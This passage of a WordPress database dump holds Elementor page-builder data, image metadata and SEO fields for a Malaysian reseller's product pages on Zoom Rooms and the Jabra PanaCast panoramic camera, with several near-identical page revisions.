\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\",\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6306,3067,'_elementor_version','0.4'),(6364,3072,'_elementor_edit_mode','builder'),(6365,3072,'_elementor_template_type','post'),(6375,3074,'_edit_last','1'),(6376,3074,'_wp_page_template','template-fullwidth.php'),(6377,3074,'_hide_page_title',''),(6378,3074,'_hide_header',''),(6379,3074,'_hide_footer',''),(6380,3074,'_hide_breadcrumb',''),(6381,3074,'_cover',''),(6382,3074,'_show_excerpt',''),(6383,3074,'_wc_apply_product',''),(6384,3074,'_yoast_wpseo_content_score','60'),(6399,3079,'_wp_attached_file','2019/07/Jabra-PanaCast.jpg'),(6386,3074,'_elementor_template_type','post'),(6387,3074,'_elementor_version','2.5.14'),(6400,3079,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:425;s:4:\"file\";s:26:\"2019/07/Jabra-PanaCast.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Jabra-PanaCast-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(6401,3079,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.97067033953539816337752199615351855754852294921875;s:5:\"bytes\";i:4042;s:11:\"size_before\";i:81317;s:10:\"size_after\";i:77275;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:279;s:11:\"size_before\";i:4481;s:10:\"size_after\";i:4202;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:380;s:11:\"size_before\";i:6814;s:10:\"size_after\";i:6434;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1499;s:11:\"size_before\";i:25103;s:10:\"size_after\";i:23604;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6434;s:10:\"size_after\";i:6434;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:750;s:11:\"size_before\";i:15439;s:10:\"size_after\";i:14689;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1134;s:11:\"size_before\";i:23046;s:10:\"size_after\";i:21912;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(6402,3074,'_thumbnail_id','3079'),(6437,3074,'_aioseop_description','The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching'),(6405,3074,'_yoast_wpseo_focuskw','Jabra Panacast'),(6406,3074,'_yoast_wpseo_title','Jabra PanaCast | Get Jabra Panacast from Bintara Solutions Sdn Bhd'),(6407,3074,'_yoast_wpseo_metadesc','The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching'),(6408,3074,'_yoast_wpseo_linkdex','69'),(6438,3074,'_elementor_edit_mode','builder'),(6412,3081,'_wp_attached_file','2019/07/PanaCast_HuddleRoom.jpg'),(6413,3081,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1300;s:4:\"file\";s:31:\"2019/07/PanaCast_HuddleRoom.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-768x520.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:520;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"PanaCast_HuddleRoom-1024x693.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:693;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:31:\"PanaCast_HuddleRoom-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"PanaCast_HuddleRoom-20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6414,3081,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.733190483227426970103124403976835310459136962890625;s:5:\"bytes\";i:10105;s:11:\"size_before\";i:270680;s:10:\"size_after\";i:260575;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:472;s:11:\"size_before\";i:7150;s:10:\"size_after\";i:6678;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:789;s:11:\"size_before\";i:15053;s:10:\"size_after\";i:14264;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.430000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:2171;s:11:\"size_before\";i:63318;s:10:\"size_after\";i:61147;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.069999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:3014;s:11:\"size_before\";i:98096;s:10:\"size_after\";i:95082;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:642;s:11:\"size_before\";i:11816;s:10:\"size_after\";i:11174;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1268;s:11:\"size_before\";i:29500;s:10:\"size_after\";i:28232;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.819999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:1749;s:11:\"size_before\";i:45747;s:10:\"size_after\";i:43998;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(6415,3074,'_elementor_data','[{\"id\":\"25c4120\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"27461e35\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"72b50f19\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 class=\\\"ng-scope\\\">Jabra PanaCast<\\/h1>\\r\\n<h4 class=\\\"ng-binding ng-scope\\\">Engineered to be the world\\u2019s first intelligent 180\\u00b0 Panoramic 4K plug-and-play video solution.<\\/h4>\\r\\n&nbsp;\\r\\n\\r\\n<img src=\\\"https:\\/\\/www.apac.jabra.com\\/-\\/media\\/Images\\/Products\\/Jabra-Panacast\\/V2\\/TopBanner\\/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\\\" \\/>\\r\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/p>\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e5b921f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0a7275\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0a9d721\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0011afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.33},\"elements\":[{\"id\":\"3bda649\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/07\\/PanaCast_HuddleRoom.jpg\",\"id\":3081}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"7207e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.67},\"elements\":[{\"id\":\"4eded05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Perfect for small meeting rooms<\\/h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180\\u00b0 view. Enjoy a natural, inclusive human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d25c98d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78aa81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b222883\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9aa57d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b3f5c25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Inclusive<\\/h1><h2>Unique, real-time video stitching for a natural 180\\u00b0 view<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"07342a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"47405be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180\\u00b0 view of the room. Enjoy a natural, human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"456085f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f657992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4b992a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Contact sales<\\/h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.<\\/h4><div>[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/div><div>\\u00a0<\\/div>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6416,3082,'_wp_page_template','template-fullwidth.php'),(6417,3082,'_elementor_template_type','post'),(6418,3082,'_elementor_version','2.5.14'),(6419,3082,'_thumbnail_id','3079'),(6420,3082,'_elementor_edit_mode','builder'),(6421,3082,'_elementor_data','[{\"id\":\"25c4120\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"27461e35\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"72b50f19\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 class=\\\"ng-scope\\\">Jabra PanaCast<\\/h1>\\r\\n<h4 class=\\\"ng-binding ng-scope\\\">Engineered to be the world\\u2019s first intelligent 180\\u00b0 Panoramic 4K plug-and-play video solution.<\\/h4>\\r\\n&nbsp;\\r\\n\\r\\n<img src=\\\"https:\\/\\/www.apac.jabra.com\\/-\\/media\\/Images\\/Products\\/Jabra-Panacast\\/V2\\/TopBanner\\/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\\\" \\/>\\r\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/p>\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e5b921f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0a7275\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0a9d721\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0011afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.33},\"elements\":[{\"id\":\"3bda649\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/07\\/PanaCast_HuddleRoom.jpg\",\"id\":3081}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"7207e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.67},\"elements\":[{\"id\":\"4eded05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Perfect for small meeting rooms<\\/h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180\\u00b0 view. Enjoy a natural, inclusive human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d25c98d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78aa81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b222883\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9aa57d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b3f5c25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Inclusive<\\/h1><h2>Unique, real-time video stitching for a natural 180\\u00b0 view<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"07342a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"47405be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180\\u00b0 view of the room. Enjoy a natural, human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(6424,3083,'_wp_page_template','template-fullwidth.php'),(6425,3083,'_elementor_template_type','post'),(6426,3083,'_elementor_version','2.5.14'),(6427,3083,'_thumbnail_id','3079'),(6428,3083,'_elementor_edit_mode','builder'),(6429,3083,'_elementor_data','[{\"id\":\"25c4120\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"27461e35\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"72b50f19\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 class=\\\"ng-scope\\\">Jabra PanaCast<\\/h1>\\r\\n<h4 class=\\\"ng-binding ng-scope\\\">Engineered to be the world\\u2019s first intelligent 180\\u00b0 Panoramic 4K plug-and-play video solution.<\\/h4>\\r\\n&nbsp;\\r\\n\\r\\n<img src=\\\"https:\\/\\/www.apac.jabra.com\\/-\\/media\\/Images\\/Products\\/Jabra-Panacast\\/V2\\/TopBanner\\/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\\\" \\/>\\r\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/p>\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e5b921f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0a7275\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0a9d721\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0011afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.33},\"elements\":[{\"id\":\"3bda649\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/07\\/PanaCast_HuddleRoom.jpg\",\"id\":3081}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"7207e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.67},\"elements\":[{\"id\":\"4eded05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Perfect for small meeting rooms<\\/h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180\\u00b0 view. Enjoy a natural, inclusive human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d25c98d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78aa81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b222883\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9aa57d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b3f5c25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Inclusive<\\/h1><h2>Unique, real-time video stitching for a natural 180\\u00b0 view<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"07342a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"47405be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180\\u00b0 view of the room. Enjoy a natural, human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"456085f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f657992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4b992a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Contact sales<\\/h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.<\\/h4><div>[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/div><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6448,3087,'_elementor_template_type','post'),(6449,3087,'_elementor_version','2.5.14'),(6450,3087,'_thumbnail_id','3079'),(6451,3087,'_elementor_data','[{\"id\":\"25c4120\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"27461e35\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"72b50f19\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 class=\\\"ng-scope\\\">Jabra PanaCast<\\/h1>\\r\\n<h4 class=\\\"ng-binding ng-scope\\\">Engineered to be the world\\u2019s first intelligent 180\\u00b0 Panoramic 4K plug-and-play video solution.<\\/h4>\\r\\n&nbsp;\\r\\n\\r\\n<img src=\\\"https:\\/\\/www.apac.jabra.com\\/-\\/media\\/Images\\/Products\\/Jabra-Panacast\\/V2\\/TopBanner\\/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\\\" \\/>\\r\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/p>\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e5b921f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0a7275\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0a9d721\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0011afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.33},\"elements\":[{\"id\":\"3bda649\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/07\\/PanaCast_HuddleRoom.jpg\",\"id\":3081}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"7207e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.67},\"elements\":[{\"id\":\"4eded05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Perfect for small meeting rooms<\\/h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180\\u00b0 view. Enjoy a natural, inclusive human perspective, with no blind 